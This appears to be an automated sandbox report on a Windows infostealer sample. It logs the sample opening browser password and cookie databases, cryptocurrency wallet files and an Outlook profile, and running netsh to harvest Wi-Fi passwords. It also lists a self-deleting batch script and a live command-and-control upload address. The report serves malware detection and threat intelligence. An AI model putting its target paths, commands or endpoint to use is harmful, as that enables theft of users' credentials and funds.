Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: Amcache.hve.LOG1.24.dr, Amcache.hve.24.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.LOG1.24.dr, Amcache.hve.24.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.24.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.2107.4-0\msmpeng.exe
Source: bPkG0wTVon.exe, 00000000.00000002.1503654046.0000000005320000.00000004.00000020.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1506746297.0000000007762000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: bPkG0wTVon.exe, 00000000.00000002.1507851310.0000000007875000.00000004.00000020.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1503654046.0000000005320000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.LOG1.24.dr, Amcache.hve.24.dr | Binary or memory string: MsMpEng.exe
Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: pathToSignedReportingExe: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\bPkG0wTVon.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

          Stealing of Sensitive Information

Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Electrum
Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $}qTC:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbt-}q
Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $}q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallett-}q
Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $}q1C:\Users\user\AppData\Roaming\Ethereum\keystoret-}q
Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.000000000291B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3 Wallet
Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Ethereum
Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $}q5C:\Users\user\AppData\Local\Coinomi\Coinomi\walletst-}q
Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\bPkG0wTVon.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\bPkG0wTVon.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb
Source: C:\Users\user\Desktop\bPkG0wTVon.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
Source: C:\Users\user\Desktop\bPkG0wTVon.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\bPkG0wTVon.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\bPkG0wTVon.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\bPkG0wTVon.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\bPkG0wTVon.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.log
Source: C:\Users\user\Desktop\bPkG0wTVon.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: bPkG0wTVon.exe PID: 8592, type: MEMORYSTR
MITRE ATT&CK Matrix (as reported):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 841 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 111 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 11 Process Injection | 2 Obfuscated Files or Information | LSASS Memory | 135 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Software Packing | Security Account Manager | 941 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 63 Virtualization/Sandbox Evasion | Distributed Component Object Model | 1 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 63 Virtualization/Sandbox Evasion | LSA Secrets | 3 Process Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Process Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Behavior Graph (ID 1578055, sample bPkG0wTVon.exe, start date 19/12/2024, architecture WINDOWS, score 100):

• Network: 89.23.100.233 port 1490 (local port 49718), MAXITEL-ASRU, Russian Federation; icanhazip.com 104.16.184.241 port 80 (local port 49717), CLOUDFLARENETUS, United States; DNS lookup 245.246.1.0.in-addr.arpa
• Signatures on the sample: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Sigma detected: Capture Wi-Fi password; 6 other signatures
• bPkG0wTVon.exe (started): Queries sensitive battery information (via WMI, Win32_Battery); Queries sensitive sound device information (via WMI, Win32_SoundDevice); Queries sensitive printer information (via WMI, Win32_Printer); 11 other signatures; starts cmd.exe (three instances) and WerFault.exe
• cmd.exe: Uses netsh to modify the Windows network and firewall settings; Tries to harvest and steal WLAN passwords; child processes: tasklist.exe, conhost.exe, netsh.exe, findstr.exe, chcp.com, taskkill.exe, 2 other processes
• WerFault.exe: dropped C:\ProgramData\Microsoft\...\Report.wer (Unicode)

Source | Detection | Scanner | Label
bPkG0wTVon.exe | 31% | Virustotal |
bPkG0wTVon.exe | 100% | Avira | HEUR/AGEN.1310131
bPkG0wTVon.exe | 53% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook
bPkG0wTVon.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
http://89.23.100.233:1490t- | 0% | Avira URL Cloud | safe
http://beta.visualstudio.net/net/sdk/feedback.asp | 0% | Avira URL Cloud | safe
http://89.23.100.233:1490/upload | 0% | Avira URL Cloud | safe
http://89.23.100.233:1490 | 0% | Avira URL Cloud | safe
http://89.23.100.233:1490/upload?File | 0% | Avira URL Cloud | safe
http://upx.sf.net | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
icanhazip.com | 104.16.184.241 | true | false | | high
245.246.1.0.in-addr.arpa | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://icanhazip.com/ | false | | high
http://89.23.100.233:1490/upload | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
89.23.100.233 | unknown | Russian Federation | 48687 | MAXITEL-ASRU | true
104.16.184.241 | icanhazip.com | United States | 13335 | CLOUDFLARENETUS | false
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1578055
                                          Start date and time:2024-12-19 08:23:58 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 7m 45s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
                                          Run name:Suspected VM Detection
Number of new started processes analysed: 28
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:bPkG0wTVon.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@25/21@2/2
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 128
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 23.55.253.34, 184.31.62.93, 20.42.65.92, 40.126.28.11
                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenFile calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
02:26:12 | API Interceptor | 78x Sleep call for process: bPkG0wTVon.exe modified
02:26:24 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
89.23.100.233 | 3gJQoqWpxb.bat | malicious | Unknown | 89.23.100.233:1490/upload
89.23.100.233 | 7fE6IkvYWf.exe | malicious | Unknown | 89.23.100.233:1490/upload
89.23.100.233 | T05Dk6G8fg.exe | malicious | Unknown | 89.23.100.233:1488/upload
89.23.100.233 | 3K5MXGVOJE.exe | malicious | Unknown | 89.23.100.233:1489/upload
89.23.100.233 | VaXmr82RIb.exe | malicious | Unknown | 89.23.100.233:1488/upload
104.16.184.241 | zyEDYRU0jw.exe | malicious | Arcane | icanhazip.com/
104.16.184.241 | zyEDYRU0jw.exe | malicious | Arcane | icanhazip.com/
104.16.184.241 | itLDZwgFNE.exe | malicious | Flesh Stealer | icanhazip.com/
104.16.184.241 | 3gJQoqWpxb.bat | malicious | Unknown | icanhazip.com/
104.16.184.241 | 7fE6IkvYWf.exe | malicious | Unknown | icanhazip.com/
104.16.184.241 | T05Dk6G8fg.exe | malicious | Unknown | icanhazip.com/
104.16.184.241 | VaXmr82RIb.exe | malicious | Unknown | icanhazip.com/
104.16.184.241 | Pdf Reader.exe | malicious | Stealerium | icanhazip.com/
104.16.184.241 | gKWbina3a4.bat | malicious | Stealerium | icanhazip.com/
104.16.184.241 | uyz4YPUyc9.exe | malicious | Stealerium | icanhazip.com/

Match | Associated Sample Name / URL | Detection | Threat Name | Context
icanhazip.com | zyEDYRU0jw.exe | malicious | Arcane | 104.16.184.241
icanhazip.com | zyEDYRU0jw.exe | malicious | Arcane | 104.16.184.241
icanhazip.com | itLDZwgFNE.exe | malicious | Flesh Stealer | 104.16.184.241
icanhazip.com | 3gJQoqWpxb.bat | malicious | Unknown | 104.16.184.241
icanhazip.com | CVmkXJ7e0a.exe | malicious | SheetRat | 104.16.185.241
icanhazip.com | file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT | 104.16.185.241
icanhazip.com | file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar | 104.16.185.241
icanhazip.com | 7fE6IkvYWf.exe | malicious | Unknown | 104.16.184.241
icanhazip.com | iGxCM2I5u9.exe | malicious | Flesh Stealer | 104.16.185.241
icanhazip.com | T05Dk6G8fg.exe | malicious | Unknown | 104.16.184.241

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | 66776676676.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.177.134
CLOUDFLARENETUS | S6oj0LoSiL.exe | malicious | LummaC | 104.21.64.80
CLOUDFLARENETUS | pM3fQBuTLy.exe | malicious | Vidar | 172.64.41.3
CLOUDFLARENETUS | dlhost.exe | malicious | XWorm | 104.20.4.235
CLOUDFLARENETUS | c2A6GRyAwn.dll | malicious | Nitol | 104.21.42.47
CLOUDFLARENETUS | script.hta | malicious | CredGrabber, Meduza Stealer | 104.26.12.205
CLOUDFLARENETUS | c2A6GRyAwn.dll | malicious | Nitol | 104.21.42.47
CLOUDFLARENETUS | AWrVzd6XpC.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 172.67.209.202
CLOUDFLARENETUS | Brooming.vbs | malicious | Remcos, GuLoader | 104.21.86.72
CLOUDFLARENETUS | 469oyXQbRY.exe | malicious | LummaC | 172.67.179.109
MAXITEL-ASRU | itLDZwgFNE.exe | malicious | Flesh Stealer | 89.23.100.233
MAXITEL-ASRU | 3gJQoqWpxb.bat | malicious | Unknown | 89.23.100.233
MAXITEL-ASRU | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc | 89.23.100.42
MAXITEL-ASRU | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 89.23.100.42
MAXITEL-ASRU | 7fE6IkvYWf.exe | malicious | Unknown | 89.23.100.233
MAXITEL-ASRU | iGxCM2I5u9.exe | malicious | Flesh Stealer | 89.23.100.233
MAXITEL-ASRU | T05Dk6G8fg.exe | malicious | Unknown | 89.23.100.233
MAXITEL-ASRU | 3K5MXGVOJE.exe | malicious | Unknown | 89.23.100.233
MAXITEL-ASRU | VaXmr82RIb.exe | malicious | Unknown | 89.23.100.233
MAXITEL-ASRU | Installer_setup32_64x.exe | malicious | LummaC, Stealc | 89.23.96.109
                                          No context
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):1.4378659784812857
                                          Encrypted:false
                                          SSDEEP:192:7RDMbALBLR6tmWbk9auo75E6UVWXaY26ddDu76+fAIO8E:9obmtccWbk9al5EYaQPDu76+fAIO8E
                                          MD5:3BA0BD7D65A08E0DB88CA4D9C7B47D1A
                                          SHA1:D2974BEFA96F5931339C2FA01C491E8C70A9C1FF
                                          SHA-256:D4B58F422A2804F8B66DDB28FC68CA3BE32D7A8A47A443F04A5C76D1AE726F04
                                          SHA-512:0EA8414A01BFB5E3F25B04AAADCFC75C05C4C62B8748857EA3A2087682971980B88DDF011C0119FC056FFB95F91E36C93D5539BBB4B0523944630ED78C279918
                                          Malicious:true
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.6.6.7.8.1.8.7.5.3.0.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.6.6.7.8.2.3.4.3.9.1.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.c.a.8.9.1.4.b.-.6.4.e.e.-.4.b.5.a.-.8.c.f.e.-.8.1.9.e.4.e.f.0.d.1.4.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.f.5.9.6.8.1.2.-.3.b.a.d.-.4.c.c.e.-.9.5.b.4.-.3.9.0.e.e.6.9.e.9.2.7.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.P.k.G.0.w.T.V.o.n...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.r.c.a.n.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.1.9.0.-.0.0.0.1.-.0.0.5.0.-.6.e.0.4.-.9.3.4.2.e.7.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.c.7.e.a.5.d.c.e.a.4.d.7.e.2.0.c.1.c.8.f.0.6.8.9.a.d.8.a.4.0.8.0.0.0.0.0.0.0.0.!.0.0.0.0.6.a.3.3.f.b.4.5.b.f.a.4.9.6.c.8.5.5.9.9.4.7.6.4.0.a.e.0.4.4.b.1.d.7.8.d.3.9.
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Thu Dec 19 07:26:22 2024, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):314606
                                          Entropy (8bit):4.025780587492299
                                          Encrypted:false
                                          SSDEEP:3072:rWPr4uEqzyLeY6RCLTgp0ska+PaWqT9rJs21oYU:rGr4WySsTgGe9uH
                                          MD5:1060D17ADC5823F788CB6E134DFF24AE
                                          SHA1:F134D21AA6FC1004195BE94A3ACDB9674C8975F6
                                          SHA-256:43874C41A83A533B72BD4BBA1111A13E04535FF0A06B8F3D0CB922EB739A43B3
                                          SHA-512:E7E703A1B614602AC2DB58A8F4F771C7703436CCD6AE360FB103546C227096753265CC31DCABBEB9D4CF89EBE063498790235AC895DCBE9C4320AE092DBF9F9C
                                          Malicious:false
                                          Preview:MDMP..a..... .........cg............4...........P,..H.......<....3.......'...F..........`.......8...........T...............G...........3...........5..............................................................................bJ......X6......GenuineIntel...........T........!....cg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8356
                                          Entropy (8bit):3.682068932608255
                                          Encrypted:false
                                          SSDEEP:192:R9l7lZNiNt6KJ6YOFSU9zGgmfZksAPupDM89befsfBKm:R9lnNiX6s6YMSU9zGgmfCSeEfN
                                          MD5:A0375820611DDE3BEC728EC982D3D3F2
                                          SHA1:122622A92889DE5FFA3963CD8901709C24C230AC
                                          SHA-256:947302982E636BA92FD6EB91BC7EC9A2BE47BF32C8C51A919BB8C5CC018D7EBD
                                          SHA-512:ADCF4DF135AACC4F760B58176D445B7C1C2FF5F613F39E853AE60844472595A33EDB4736459EA6F81FD665A939755ACF609066331C86E3CA8AD4636884A74F2F
                                          Malicious:false
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.5.9.2.<./.P.i.
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4860
                                          Entropy (8bit):4.476275283548446
                                          Encrypted:false
                                          SSDEEP:48:cvIwwtl8zsve702I7VFJ5WS2Cfjkps3rm8M4JV/vPFKo+q8vR/v7azZ+3d:uILfG7GySPfFJ+oKdazZqd
                                          MD5:EF393930AA7828181D633ABF4B3A200D
                                          SHA1:9D53E79DB74EDC8527BFA300FF14448B322DB62E
                                          SHA-256:09F9C44F613EB29021B8E8D8EDF9BC47530B14060A92ABBC779EBC02594C6EF8
                                          SHA-512:965FDF4B7BD020F83E55B3C2CA62898147E0038EB6FD9F967EF19A3B7981AF9BD4FBE8CDE573D460F464CEAE09300D2C212D3A2CEF50D4F2AE4180815DA2D3F3
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222981637" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                          Process:C:\Users\user\Desktop\bPkG0wTVon.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):103985
                                          Entropy (8bit):6.082865991437579
                                          Encrypted:false
                                          SSDEEP:1536:QJFxqXOHF+7gFajcCN5tTsxDxEM0pMtwGUFJ526GH1B1WAUt6+1NJsf:QxwOl+V95+xDxLqMtwGU2B1s6+/K
                                          MD5:6DE273C47E7F54F2910BC516F886633B
                                          SHA1:230A6D3F3510D1231BCDAD4F4BD843F1575A84A5
                                          SHA-256:89545282AD73EE9D530E4BACEE9A2046322C767CB7564E8E12694F30CF8CDDEF
                                          SHA-512:AB5488E0C9622FCC6F4610B0501E79EA87C1963480E8E9F217B46F94E7DDFD32FE0BED9D1329093C58F2D330A49E2D8468CDFD4C6CC8689590671B36F9504617
                                          Malicious:false
                                          Preview:{"accessibility":{"screen_ai":{"last_used_time":"13370432463378508"}},"autofill":{"ablation_seed":"f4fbGGU/iY4=","states_data_dir":"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\AutofillStates\\2020.11.2.164946"},"background_tracing":{"session_state":{"privacy_filter":true,"state":0}},"breadcrumbs":{"enabled":false,"enabled_time":"13369750774825357"},"browser":{"default_browser_infobar_declined_count":1,"default_browser_infobar_last_declined_time":"13370432455860460","default_browser_prompt_refresh_study_group":"enabled-v2-arm-3","last_redirect_origin":"","last_whats_new_version":128,"shortcut_migration_version":"92.0.4515.159","whats_new_hats_activation_threshold":64},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"local":{"password_hash_data_list":[]},"management":{"platform"
                                          Process:C:\Users\user\Desktop\bPkG0wTVon.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):15119
                                          Entropy (8bit):5.63468773874796
                                          Encrypted:false
                                          SSDEEP:384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
                                          MD5:AFC16C019BBEB3904B37576B9179D9CD
                                          SHA1:DBA86847FFE7AD2E887F1A51FBD464357850488D
                                          SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
                                          SHA-512:752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
                                          Malicious:false
                                          Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b
                                          Process:C:\Users\user\Desktop\bPkG0wTVon.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):107
                                          Entropy (8bit):5.194131589647515
                                          Encrypted:false
                                          SSDEEP:3:HFTEOuMJcFKsoQmyYwBRZDEXEPONy+WHhCaNHovn:yOuMJNQ4weonRBXCvn
                                          MD5:EFA9B9FD5EF0E51CA5963B4BB4CC14BA
                                          SHA1:4005AAE73144A6F9B21F8EE46A36B23C51F5DB2D
                                          SHA-256:84255BBC56274497B9F5C3B20E54429E3753701B4E5BAA9EFAC4D6CB968166D1
                                          SHA-512:C578FA9F528B295C1D25218BD31B8E39CBFCDB26F7091D9846BB9198DF782E266D20DB5EDF0B8C79F2F7D76436DA9BF855CA5A2ACF39E4F07CA6CE7904001605
                                          Malicious:false
                                          Preview:chcp 65001..TaskKill /F /IM 8592..Timeout /T 2 /Nobreak..Del /ah "C:\Users\user\Desktop\bPkG0wTVon.exe"..
                                          Process:C:\Users\user\Desktop\bPkG0wTVon.exe
                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):98304
                                          Entropy (8bit):0.08231524779339361
                                          Encrypted:false
                                          SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                          MD5:886A5F9308577FDF19279AA582D0024D
